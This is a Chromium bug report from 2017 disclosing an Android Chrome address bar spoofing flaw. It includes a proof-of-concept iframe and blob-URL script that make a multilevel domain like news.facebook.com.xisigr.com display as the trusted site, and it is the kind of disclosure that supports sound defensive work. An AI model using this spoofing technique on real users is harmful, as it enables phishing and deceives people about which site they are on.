Issue metadata
Sign in to add a comment
|
Security: Address Bar URL Spoofing With Multilevel Domain Name
Reported by
xis...@gmail.com,
May 17 2017
|
||||||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS I think this Bug might be different from issue 646278 and issue 721184. In Android phones, the Chrome address bar has limited visual display space, and an attacker can target a multi-level domain name, such as news.facebook.com.xisigr.com. When the user opens, the spoof domain name(news.facebook.com) will appear in the address bar, and the real domain name (xisigr.com) will be hidden . Of course, the length of the spoof domain name is limited by the size of the user's phone screen, but in targeted attacks, this domain name spoofing is feasible. VERSION Chrome Version: [58.0.3029.83] + [stable] Operating System: [Android] REPRODUCTION CASE This POC is written on the basis of my test phone screen size, just to prove the feasibility of the attack. (1) Open http://xisigr.com/test/spoof/chrome/blob_click.html in Android Chrome ----blob_click.html--- <iframe src="http://news.facebook.com.xisigr.com/test/spoof/chrome/blob_3.html" frameborder="0" noresize="noresize"></iframe> ----blob_click.html--- (2) Click the button "Click me" ----blob_3.html--- <script> var bb = function(){ args = ['<h1>spoofing</h1>']; b = new Blob(args, {type: 'text/html'}); window.open(URL.createObjectURL(b)); }; </script> <a href="javascritp:void(0)" onclick='bb()'><h1>Click me</h1></a> ----blob_3.html---
,
May 17 2017
,
Sep 23 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, May 17 2017